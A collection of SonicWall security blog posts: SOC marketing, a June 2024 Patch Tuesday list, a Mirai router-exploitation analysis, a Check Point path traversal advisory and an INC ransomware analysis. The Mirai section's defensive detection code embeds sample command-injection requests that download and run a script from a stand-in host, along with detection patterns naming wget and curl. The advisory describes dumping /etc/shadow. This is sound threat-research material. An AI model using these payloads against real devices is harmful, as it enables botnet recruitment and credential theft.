The Lifecycle of a Threat: The Inner Workings of the Security Operations Center

In a world where cyber criminals target businesses both large and small with ever-changing tactics and techniques, heroes emerge: Managed Service Providers (MSPs). They may not wear capes, but every day, MSPs provide crucial security and IT support to their customers. However, with new threats appearing almost daily, it can be impossible for the average MSP to keep up, especially as threat actors tend to take action well outside of normal working hours, including weekends, holidays and the middle of the night.

Having a Security Operations Center (SOC) is a crucial step for MSPs to defend their clients at all hours of the day and night, but building a SOC yourself can cost upwards of $1 million and come with many staffing and compliance headaches. For many MSPs, partnering to get a SOC is the way to go, such as partnering with SonicWall and our Managed Security Services team.

SonicWall’s SOC is defending our MSP partners and their clients day and night from shadowy cybercriminals. Here’s how they do it.

The Trifecta of the SOC: People, Process, Technology

Any effective SOC is a combination of three things: people, process and technology. While it’s easy to focus only on security tools like endpoint detection or antivirus software, it’s crucial that those tools are configured properly and that effective processes are in place to ensure the SOC is running efficiently.

That’s why the people are the most important element of the SOC: they are cyber experts who stay on top of the latest cyber threats and new techniques being used by threat actors. They also apply that knowledge and experience to the configuration of security tools. They can quickly determine which alerts are relevant and recognize patterns in the alerts that security tools throw, allowing them to spot and stop attacks at very early stages, minimizing damage for your clients. While security tools and software are important, it’s the people who bring the true value to a SOC.

Preparation is Everything

Arguably the most important part of the incident response cycle is the preparation before a cyber event takes place. Taking the time to ensure that all security tools have the latest updates, all endpoints have the correct tools installed, and that tools are using the latest security rules can make the difference between an annoying minor alert and a full security incident.

SonicWall’s SOC works with our partners to ensure that their environments are as prepared and protected as possible before a threat actor ever takes action. When new partners start out with SonicWall Managed Security Services, the SOC team conducts a white-glove onboarding process to ensure security tools are installed and configured properly. After that, the team performs configuration audits twice monthly and provides a report card to partners that includes any necessary actions needed to be optimally secure.

Minor, Major and Critical Alerts

The SonicWall Security Operations Center monitors for alerts and abnormal behavior 24 hours a day to protect our MSP partners and their clients from cyber threats. When alerts come in from security tools, a SOC analyst conducts an investigation. The SOC’s rules and technology configurations automatically classify alerts as minor, major or critical, and the SOC analyst can then upgrade or downgrade the alert as needed based on what they find in their investigation.

  • Minor Alerts are used for situations where abnormal activities have been identified in the environment, such as files being quarantined in unusual folders. There’s no evidence of anything else happening; something’s just weird. These alerts can be false positives. If further investigation or action is recommended, the SOC analyst will email you.
    If we were to think of the SOC as firefighters, in a Minor Alert, the SOC smells smoke but finds no evidence of a fire.
  • Major Alerts are used when there is confidence of malicious or suspicious activity in the environment. Often, this is activity that was stopped by security tools, such as quarantined malware, but further investigation is warranted to ensure the full threat has been addressed. In the event of a Major Alert, the SonicWall SOC will contact you by email with recommended next steps.
    To use our firefighter analogy, in Major Alerts the SOC smells smoke and the smoke detector is going off, but there is no evidence of an active fire.
  • Critical Alerts are used when there is high confidence of an active compromise happening. These alerts are when the SOC takes immediate action to mitigate the threat to keep any damage as minimal as possible, such as isolating an endpoint, pulling a server offline or deactivating a potentially compromised user account. Taking these immediate actions in response to a critical threat helps reduce attacker dwell time and keeps the attack from spreading across the network.
    In our firefighter comparison, this is the time the SOC sees active flames and works quickly to put them out to keep them from spreading and causing more damage.

When a Critical Alert happens, the SonicWall SOC team will call you on the phone every fifteen minutes for the first hour, and then every hour after that. Don’t worry – if you don’t answer, the SOC team won’t wait. The threat will still be addressed and we’ll fill you in once we’re able to connect.

Once the threat is contained, the SOC analyst will create a report that documents the incident, including what specifically happened, the scope of the incident, the actions they took to mitigate the threat, and any other areas of impact you may need to be aware of. They will also make recommendations for your next steps toward full remediation.

SonicWall’s Security Operations Center stands ready to defend all our MSP partners and their end clients, and we’ve made getting the around-the-clock protection of a SOC easier than ever. Our Managed Security Services are available with no annual contracts or long-term commitments and with no minimums. We partner with you and scale with you as your business scales – whether up or down.

Ready to get started? Contact us today to learn how you can get started with Managed Detection and Response (MDR) with a free 30-day proof of concept!


Microsoft Security Bulletin Coverage for June 2024

Overview

Microsoft’s June 2024 Patch Tuesday has 49 vulnerabilities, 24 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2024 and has produced coverage for seven of the reported vulnerabilities.

Vulnerabilities with Detections

CVE             CVE Title                                                                 Signature
CVE-2024-30080  Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability     IPS 4452 Microsoft Message Queuing RCE (CVE-2024-30080)
CVE-2024-30084  Windows Kernel-Mode Driver Elevation of Privilege Vulnerability           ASPY 6802 Exploit-exe exe.MP_391
CVE-2024-30087  Win32k Elevation of Privilege Vulnerability                               ASPY 6805 Exploit-exe exe.MP_392
CVE-2024-30088  Windows Kernel Elevation of Privilege Vulnerability                       ASPY 6806 Exploit-exe exe.MP_393
CVE-2024-30089  Microsoft Streaming Service Elevation of Privilege Vulnerability          ASPY 581 Exploit-exe exe.MP_390
CVE-2024-30091  Win32k Elevation of Privilege Vulnerability                               ASPY 580 Exploit-exe exe.MP_389
CVE-2024-35250  Windows Kernel-Mode Driver Elevation of Privilege Vulnerability           ASPY 579 Exploit-exe exe.MP_388


Release Breakdown

The vulnerabilities can be classified into the following categories:

For June there is one Critical, 48 Important and zero Moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the Patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-30065 Windows Themes Denial of Service Vulnerability
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability


Elevation of Privilege Vulnerabilities

CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability
CVE-2024-35254 Azure Monitor Agent Elevation of Privilege Vulnerability
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability
CVE-2024-37325 Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability


Information Disclosure Vulnerabilities

CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability


Remote Code Execution Vulnerabilities

CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability

Decoding Router Vulnerabilities Exploited by Mirai: Insights from SonicWall’s Honeypot Data

As seen in Cybersecurity Insiders, June 2024.

SonicWall has already successfully defended against 5.8 million Mirai-related attacks in 2024, and we’ve seen a spike in honeypot activity related to Mirai, all aimed at exploiting vulnerabilities in aging router systems. These attacks exhibit striking similarities, a theme we will explore further in subsequent sections of this blog. By understanding the common threads among these exploits, we can better fortify our defenses against future incursions and safeguard our network infrastructure from potential compromise. To facilitate this understanding, SonicWall is committed to continually releasing threat intelligence to ensure the industry has the most complete and updated information related to attacks on small- and medium-sized businesses (SMBs). Our research team has created five signatures across our product portfolio to ensure our customers are protected from this increasing threat.

Mirai is a significant malware threat known for targeting Internet of Things (IoT) devices, such as routers and IP cameras, to form extensive botnets. Emerging in 2016, Mirai exploits weak default credentials and vulnerabilities to compromise devices, granting attackers remote access. These compromised devices are then utilized to orchestrate large-scale Distributed Denial of Service (DDoS) attacks, posing a substantial threat to internet infrastructure worldwide.

Tracing the Path of Mirai’s Evolution

Mirai, created by Paras Jha, Josiah White and Dalton Norman, was crafted to exploit IoT device vulnerabilities for botnet recruitment. It was first detected in August 2016 by MalwareMustDie researchers during a large DDoS attack on Brian Krebs’ cybersecurity site. Mirai’s source code was subsequently released by its creators in September. This release spawned numerous malware iterations, intensifying IoT security concerns. The most memorable incidents include the unprecedented 620 Gbps DDoS attack on KrebsOnSecurity and the October 2016 Dyn cyberattack, which paralyzed internet services for major platforms like Twitter and Netflix. In 2024, SonicWall has already prevented 13.6 million attacks against IoT devices, a 29% increase from 2023.

Mirai operates through a systematic sequence of steps: scanning for vulnerable IoT devices, exploiting weaknesses like default credentials to gain entry, infecting them to form a botnet and launching potent DDoS attacks. It spreads by continuously seeking new targets and adapts dynamically to evade detection and mitigation efforts as explained in Figure 1.

Figure 1: Mirai attack chain

Honeypot Insights

SonicWall’s honeypots observed Mirai spreading through exploits for old vulnerabilities in routers from vendors such as Zyxel, Netgear, D-Link and TP-Link. Let us examine some of the honeypot findings through the similarities in their attack patterns.

1. Injection of Commands: Each attack attempts to inject and execute commands on the targeted device. These commands are typically aimed at downloading additional malicious payloads, granting unauthorized access or somehow compromising the device. For example, from a packet captured from our honeypots in Figure 2, wget, chmod and rm commands are injected.

Figure 2: Zyxel USG FLEX 100W Command Injection (CVE-2022-30525)

2. HTTP/HTTPS Requests: All attacks involve HTTP requests to interact with the device’s web interface or execute commands remotely. They manipulate URLs or parameters to exploit vulnerabilities in the target devices. For example, from a packet captured from our honeypots in Figure 3, an HTTP request is made to the device’s GetDeviceSettings endpoint to execute wget and chmod commands.

Figure 3: D-Link Devices HNAP SOAPAction-Header Command Execution CVE-2015-2051

3. Downloading and Executing Scripts: Many attacks found in our honeypots involve downloading additional scripts or binaries onto the device from a remote server and then executing the downloaded package. These scripts often contain malicious payloads aimed at compromising the device’s security or establishing unauthorized access. All of the downloaded scripts we reviewed continue to spread Mirai. For example, from a packet captured from our honeypots in Figure 4, the Mozi.m script is downloaded and executed.

Figure 4: NETGEAR DGN Devices Remote Command Execution

4. Operating System Commands: The commands executed by Mirai are typically shell commands or scripts intended to manipulate the device’s operating system. They often involve commands like wget, chmod, rm and sh to download scripts, change their permissions and execute them, as in the packet captured from our honeypots shown in Figure 5.

Figure 5: TP-Link Archer AX21 Command Injection CVE-2023-1389
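The four patterns above (injected commands, HTTP requests carrying them in URLs, parameters or headers, a download-and-execute sequence, and shell tooling such as wget, chmod, rm and sh) can be turned into a single triage check that runs over captured requests. The following is an added example written for this post, not SonicWall code and not taken from the honeypot captures in the figures; the request samples are constructed, use documentation addresses (192.0.2.0/24, 198.51.100.0/24, example.invalid) and do not reproduce the payload of any specific CVE.

```python
"""Flag raw HTTP requests that carry a router command-injection pattern:
shell metacharacters combined with download/execute tooling, in the
request target, the body or a header attackers commonly abuse.
Added example; the sample requests below are constructed."""
import re
from urllib.parse import unquote, unquote_plus

# Metacharacters used to chain an injected command onto the expected one.
METACHAR_RE = re.compile(r"(;|\|\||\||&&|`|\$\(|\n)")
# Tooling that the observed injections chain together.
TOOL_RE = re.compile(r"\b(wget|curl|tftp|chmod|rm|sh|busybox)\b")
# Headers that were carriers in the honeypot data (SOAPAction) or are
# commonly abused elsewhere (assumption: User-Agent, Cookie).
INSPECTED_HEADERS = ("soapaction", "user-agent", "cookie")


def _decode(text: str, form: bool = False) -> str:
    """URL-decode twice to unwrap double-encoded payloads (%253B -> %3B -> ;).
    Form bodies additionally treat '+' as a space."""
    if form:
        return unquote_plus(unquote_plus(text))
    return unquote(unquote(text))


def analyse_request(raw: str) -> dict:
    """Parse a raw request (request line, headers, blank line, body) and
    report each field that contains both metacharacters and tooling."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    request_line = lines[0] if lines else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = request_line.split(" ")
    method, target = (parts[0], parts[1]) if len(parts) >= 2 else ("", "")

    fields = {"target": _decode(target), "body": _decode(body, form=True)}
    for h in INSPECTED_HEADERS:
        if h in headers:
            fields[h] = _decode(headers[h])

    indicators = []
    for name, text in fields.items():
        metas = {m.group(0) for m in METACHAR_RE.finditer(text)}
        tools = {m.group(0) for m in TOOL_RE.finditer(text)}
        if metas and tools:  # both are required to keep false positives low
            indicators.append({"field": name, "metachars": sorted(metas),
                               "tools": sorted(tools)})
    return {"method": method, "target": target,
            "suspicious": bool(indicators), "indicators": indicators}


def triage(requests):
    """Run the check over a batch of captured requests."""
    return [analyse_request(r) for r in requests]


# Constructed samples: one benign read, then injection via a URL parameter,
# via a SOAPAction header, and via a form body.
SAMPLE_REQUESTS = [
    "GET /status.cgi?page=wan HTTP/1.1\nHost: 192.0.2.10\n\n",
    "GET /cgi-bin/setup.cgi?host=%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbot.sh"
    "%3Bchmod%20777%20bot.sh%3Bsh%20bot.sh HTTP/1.1\nHost: 192.0.2.10\n\n",
    'POST /soap HTTP/1.1\nHost: 192.0.2.10\nSOAPAction: "http://example.invalid/'
    'GetDeviceSettings/`cd /tmp; wget http://198.51.100.7/a; chmod +x a; ./a`"'
    "\n\nbody=1",
    "POST /apply.cgi HTTP/1.1\nHost: 192.0.2.10\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "ntp=pool.example.org%26%26rm%20-f%20x%3Bsh%20x",
]

if __name__ == "__main__":
    for result in triage(SAMPLE_REQUESTS):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['method']} {result['target']} {result['indicators']}")
```

Requiring both a metacharacter and a tool name in the same decoded field is the design choice that matters: either alone is common in legitimate traffic, while the combination is the download-modify-execute sequence seen across the captures. Double decoding catches the encoded variants that a single-pass WAF rule would miss.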

Who Has the Biggest Risk?

Figure 6: Mirai Hits by Industry

Not all industries are affected the same for every attack vector. By digging into the data provided by our over 1 million sensors worldwide, we can determine which industries are the most impacted by the Mirai botnet, as you can see in Figure 6. Real estate and rental businesses appear to be affected the most by Mirai attacks, with the data showing 86.09% of attacks focused on compromising property management systems. The finance and insurance sectors are also taking on a substantial number of attacks, with around 9.65% of attacks focused on the financial sector, looking to potentially expose sensitive financial data and cause disruptions to online banking services. The wholesale trade (1.88%) and professional, scientific and technical services (1.49%) sectors aren’t immune either, as they can experience supply chain disruptions and compromised networks.

Identification and Mitigation

The recent data seen by both our firewalls and honeypots underscores the urgent need to secure IoT devices to prevent their exploitation for malicious purposes. While each of the mentioned vulnerabilities affects different router products from various manufacturers, some common factors contribute to their susceptibility to exploitation by malware like Mirai. Understanding these factors can assist in preventing and detecting these types of attacks.

  1. Firmware Issues: Many of these vulnerabilities stem from weaknesses in the firmware of the routers. Firmware vulnerabilities can arise due to poor coding practices, insufficient testing or failure to address reported security issues promptly.
  2. Insecure Web Interfaces: Several vulnerabilities involve the routers’ web interfaces, which allow users to configure settings and manage the device. Weaknesses in authentication mechanisms or improper input validation can lead to remote code execution or command injection.
  3. Shell Metacharacters: Exploitation often involves the use of shell metacharacters in user-supplied input fields. These metacharacters allow attackers to manipulate command execution, enabling them to execute arbitrary commands on the router.
  4. Delayed or Lack of Patching: In many cases, vulnerabilities exploited by Mirai and similar malware have been previously disclosed, but routers remain unpatched due to delayed or absent firmware updates. This leaves devices vulnerable to exploitation even after fixes are available.
  5. Default Configurations: Default configurations, including default usernames and passwords, are often targeted by attackers. If users fail to change these default credentials, attackers can easily gain unauthorized access to the router.
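Items 2 and 3 above describe the root cause of every capture in this post: a web-interface handler that splices a user-supplied field into a shell command. The following added example (not code from any router vendor, nor SonicWall code; the ping use case and function names are hypothetical) places that pattern beside the hardened form, which validates the field against an allowlist and builds an argv list so that no shell ever interprets it.

```python
"""Vulnerable versus hardened handling of a user-supplied parameter that ends
up in an OS command. Added example with hypothetical handler names."""
import ipaddress
import re

# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, 253 chars total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
SHELL_METACHARS = set(";|&`$()<>\n")


def build_ping_command_vulnerable(host: str) -> str:
    """Vulnerable pattern: interpolate the field into a string destined for
    /bin/sh. A ';' or '`' in `host` appends a second command."""
    return f"ping -c 1 {host}"


def is_valid_target(host: str) -> bool:
    """Allowlist: an IPv4/IPv6 literal or a syntactically valid hostname.
    Anything else, including every shell metacharacter, is rejected."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def build_ping_command_hardened(host: str) -> list:
    """Hardened pattern: validate first, then return an argv list intended
    for subprocess.run(argv) without shell=True, so the value is passed to
    ping as a single argument and is never parsed by a shell."""
    if not is_valid_target(host):
        raise ValueError(f"rejected target: {host!r}")
    return ["ping", "-c", "1", host]


def contains_shell_metachars(value: str) -> bool:
    """Cheap check usable in request logging: would a shell treat any
    character in this field as syntax?"""
    return bool(SHELL_METACHARS & set(value))


if __name__ == "__main__":
    for candidate in ("192.0.2.1", "router.example.org", "192.0.2.1; wget http://198.51.100.7/x"):
        print("vulnerable:", build_ping_command_vulnerable(candidate))
        try:
            print("hardened:  ", build_ping_command_hardened(candidate))
        except ValueError as err:
            print("hardened:  ", err)
```

The validation is deliberately an allowlist of what a target may look like rather than a blocklist of characters; blocklists are what the double-encoded and backtick variants in the honeypot data get past. Using an argv list without a shell is the second, independent layer: even if validation were bypassed, there is no shell to honour the metacharacters.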

To ensure SonicWall customers are prepared for any exploitation that may occur due to these vulnerabilities, the following signatures have been released which can detect and prevent these types of attacks:

  • IPS 18387 D-Link DIR-645 HNAP SOAPAction Header Command Injection
  • IPS 15761 Zyxel USG FLEX 100W Command Injection
  • IPS 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS 15864 TP-Link Archer AX21 Command Injection
  • GAV Mirai

In addition to traditional signatures, Managed Service Providers (MSPs) can significantly enhance protection for small businesses against Mirai botnet attacks. They can deploy the human layer of security to identify attacker behaviors across their networks with full network visibility and proactive threat detection capabilities. By offering a multi-layered defense strategy, MSPs provide small businesses with the expertise and resources needed to defend against evolving cyber threats like the Mirai botnet.

Mirai’s “Mirai” (Future)

The data suggest that Mirai and its variants will continue to evolve, becoming more sophisticated and dangerous. These botnets are likely to incorporate new techniques specifically designed to exploit vulnerabilities in IoT devices, making them even more effective at compromising a wide range of targets. We can also expect these threats to employ advanced evasion tactics to bypass traditional security measures, making detection and mitigation more challenging. Additionally, the target surface for these attacks is expected to broaden significantly, especially as 5G continues to allow more devices with limited reviewed firmware to be network-connected. As technology advances, Mirai is likely to set its sights on emerging technologies, including smart home devices, industrial IoT systems and critical infrastructure.

Protecting against Mirai and similar threats requires a multi-faceted approach. Device manufacturers must prioritize security in their designs, ensuring robust authentication and regular updates. Users need to apply patches promptly to mitigate known vulnerabilities. Implementing network segmentation and strict access controls can limit the impact of Mirai attacks. Behavioral analysis through Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) aids in early detection, while traffic monitoring helps identify Distributed Denial of Service (DDoS) attacks. Managed Service Providers (MSPs) are invaluable in monitoring alerts and identifying these types of attacks. Collaboration through threat intelligence sharing enhances collective defense, and educating users on securing IoT devices is crucial for prevention.

Critical Path Traversal Vulnerability in Check Point Security Gateways (CVE-2024-24919)

Overview

The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is more severe than it initially appears. While labeled as a sensitive information disclosure vulnerability, it is actually a path traversal attack leading to an arbitrary read, allowing an attacker to read any file on the system. A proof of concept is publicly available on GitHub. To be vulnerable, the gateway needs to have Remote Access VPN or Mobile Access Software Blades enabled. Check Point has made a patch available, and it is advisable to update immediately.

Technical Overview

The flaw is a path traversal bug in the “/clients/MyCRL” endpoint, which can be exploited via manipulated POST requests containing the string “CSHELL/” somewhere in the request. Because the “strstr” function is used without proper sanitization and validation of user input, an attacker can place path traversal sequences like “../” within the POST request (Figure 1). This ultimately allows access to sensitive files like /etc/shadow, which contains the password hashes for the system. For our analysis, we used version R80.
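The substring check described above is the essence of the bug: locating a marker with strstr says nothing about where the rest of the path will resolve. The following added example (written for this post in Python; not Check Point’s code, and the document root and function names are assumptions) models that marker-only check beside a containment check that decodes, normalizes and refuses any path that escapes the root.

```python
"""Marker-only path lookup (simplified model of a strstr-style check) versus a
hardened lookup that enforces containment under a document root.
Added example; WEB_ROOT and the function names are hypothetical."""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/clients"  # assumed document root
MARKER = "CSHELL/"


def marker_only_check(body: str) -> Optional[str]:
    """Accept the request as soon as the marker appears and join whatever
    follows it onto the root without normalisation. Traversal sequences
    survive, and an absolute remainder replaces the root entirely."""
    idx = body.find(MARKER)
    if idx < 0:
        return None
    return posixpath.join(WEB_ROOT, body[idx + len(MARKER):])


def contained_path(body: str) -> Optional[str]:
    """Hardened lookup: URL-decode, reject NUL bytes and absolute paths,
    normalise away '.' and '..', then require the result to lie under
    WEB_ROOT. Returns None for anything that must not be served."""
    idx = body.find(MARKER)
    if idx < 0:
        return None
    relative = unquote(body[idx + len(MARKER):])
    if "\x00" in relative or relative.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, relative))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    for sample in ("CSHELL/crl/ca.crl", "CSHELL/../../../etc/shadow",
                   "CSHELL/..%2F..%2F..%2Fetc%2Fshadow", "CSHELL//etc/shadow"):
        print(f"{sample!r:40} marker-only={marker_only_check(sample)!r:45} "
              f"contained={contained_path(sample)!r}")
```

Two details carry the defence: decoding happens before normalisation, so encoded separators cannot slip past, and the containment test compares the normalised result against the root rather than searching the input for “..”. On a real file system the check should additionally resolve symlinks (os.path.realpath) before the comparison, since a link inside the root can point outside it.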


Figure 1: Vulnerable Code

To trigger and exploit this vulnerability, an attacker must send a POST request containing the string “CSHELL/” and include a path traversal sequence like “../”. This can be done in Python, as shown in the publicly available PoC and Figure 2 below, where “path” is the file the attacker wants access to.

Figure 2: Creating a POST request to obtain sensitive information

Leveraging this code, we can demonstrate dumping the gateway’s “/etc/shadow” file to obtain the system’s hashed credentials, as seen in Figure 3. An attacker can then attempt to crack these hashes to obtain administrative access to the firewall. The attack is not limited to this file; any file on the system can be read. Note that this is being done against the WAN interface, showing that it is accessible over the Internet.

Figure 3: Dumping Hashed Credentials

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4440 Check Point Security Gateway Path Traversal

Remediation Recommendations

Check Point’s gateway users are advised to apply the hotfix found in the advisory immediately. Check Point has labeled this a mandatory patch to express the criticality of the fix.

Relevant Links


INC Ransomware Behind Linux Threat

Overview

This week, the SonicWall Capture Labs Research team analyzed a sample of Linux ransomware. The group behind this ransomware, called INC Ransomware, has been active since it was first reported a year ago.

Infection Cycle

The malware is a Linux executable in ELF file format. A quick inspection of its strings revealed command-line arguments that can be passed to this ELF file.

Figure 1: List of Command Line Arguments

Upon execution with the identified parameters, the malware appends “INC” to the names of encrypted files.

Figure 2: Debug Output Using the --debug Option

Figure 3: Encrypted files with “INC” appended file extension

The malware also creates a file named “kill,” a shell script using the esxcli utility available in VMware ESXi to list and kill all virtual machine processes if running in an ESXi environment. Since our analysis was not conducted in such an environment, this command resulted in an error because the utility was not found.

Figure 4: Content of the “kill” and delete scripts

Another file created is “delete,” which is a shell script using the ESXi command-line utility vim-cmd to delete all available virtual machines.
Copies of ransom notes were dropped in directories where files were encrypted, consistent with other ransomware behavior.

Figure 5: Contents of “Inc_readme.html” Ransom note

The parameter ‘--motd’ also changed the message of the day (MOTD) on the infected machine to display the ransom note message upon successful login.

Figure 6: Message of the Day shows ransom note message
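The behaviours described so far leave file-system artifacts that an incident responder can sweep for on a Linux or ESXi host: files with the appended “INC” extension, the “Inc_readme.html” ransom note, and the “kill” and “delete” helper scripts that invoke esxcli and vim-cmd. The following added example (written for this post, not SonicWall code) implements that sweep; the directory tree it scans is constructed inline, and the exact form of the extension (“.INC”) is an assumption based on Figure 3.

```python
"""Sweep a directory tree for the INC ransomware artifacts described above.
Added example; the sample tree is constructed and the '.INC' suffix form is
an assumption based on the figures."""
import os
import pathlib
import shutil
import tempfile

ENCRYPTED_SUFFIX = ".INC"           # "INC" appended as a file extension (assumed form)
RANSOM_NOTE = "Inc_readme.html"     # ransom note name from Figure 5
HELPER_SCRIPTS = {"kill": "esxcli", "delete": "vim-cmd"}  # script name -> utility it calls


def scan_for_inc_indicators(root: str) -> dict:
    """Walk `root` and count encrypted files, collect ransom note paths and
    flag helper scripts whose content references the expected ESXi utility."""
    hits = {"encrypted_files": 0, "ransom_notes": [], "helper_scripts": []}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.endswith(ENCRYPTED_SUFFIX):
                hits["encrypted_files"] += 1
            elif name == RANSOM_NOTE:
                hits["ransom_notes"].append(path)
            elif name in HELPER_SCRIPTS:
                try:
                    with open(path, "r", errors="replace") as fh:
                        head = fh.read(4096)  # scripts are tiny; read the start only
                except OSError:
                    continue
                if HELPER_SCRIPTS[name] in head:
                    hits["helper_scripts"].append(path)
    return hits


def build_sample_tree() -> str:
    """Constructed stand-in for an affected host: two encrypted documents, one
    untouched file, a ransom note, and the two helper scripts (with harmless
    list-only commands in place of the real kill/delete logic)."""
    root = tempfile.mkdtemp(prefix="inc_demo_")
    docs = os.path.join(root, "docs")
    os.makedirs(docs)
    for name in ("report.pdf.INC", "budget.xlsx.INC", "notes.txt"):
        pathlib.Path(docs, name).write_bytes(b"\x00" * 16)
    pathlib.Path(docs, RANSOM_NOTE).write_text("<html>constructed note</html>")
    pathlib.Path(root, "kill").write_text("#!/bin/sh\nesxcli vm process list\n")
    pathlib.Path(root, "delete").write_text("#!/bin/sh\nvim-cmd vmsvc/getallvms\n")
    return root


def cleanup(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        print(scan_for_inc_indicators(sample_root))
    finally:
        cleanup(sample_root)
```

Matching the helper scripts on both name and content avoids flagging unrelated files that happen to be called “kill” or “delete”, which is a real concern when the sweep runs over an entire datastore. On a live ESXi host the same sweep would be pointed at the datastore mount rather than a temporary directory, and the MOTD change described above can be checked separately by comparing /etc/motd against a known-good copy.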

Visiting the URL in the ransom note led to a blog site listing all supposed victims.

Figure 7: INC Ransom blog site

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: LinuxINC.RSM(Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

For further details, visit the official man page for MOTD.


SonicWall Elevate 2024: Ready for the Next Level

It’s Time to Elevate

SonicWall’s current business momentum has been fueled by growth in its partner community. As part of our continued commitment to our partners, we’ve recently added Cloud Secure Edge and Managed Security Services to our lineup. And at RSA Conference this year, we unveiled SonicPlatform, which unifies all SonicWall products under a singular, integrated interface to streamline management tasks and foster deeper integration for our MSPs and MSSPs.  

At Elevate 2024, we’re excited to share an ultimate in-depth look at our recent evolution as well as show exclusive previews of SonicWall’s elevated corporate roadmap. You won’t want to miss out on Elevate 2024 and the unique opportunity to network, learn and strategize.   

What’s in Store for Elevate ’24?

SonicWall is committed to providing meaningful initiatives to its partners and it’s starting to pay dividends. Great success starts with good support — and SonicWall’s Elevate 2024 partner event is all about what we can do to support you! Join us for:  

  • Personalized meetings with SonicWall executives, thought leaders and product experts 
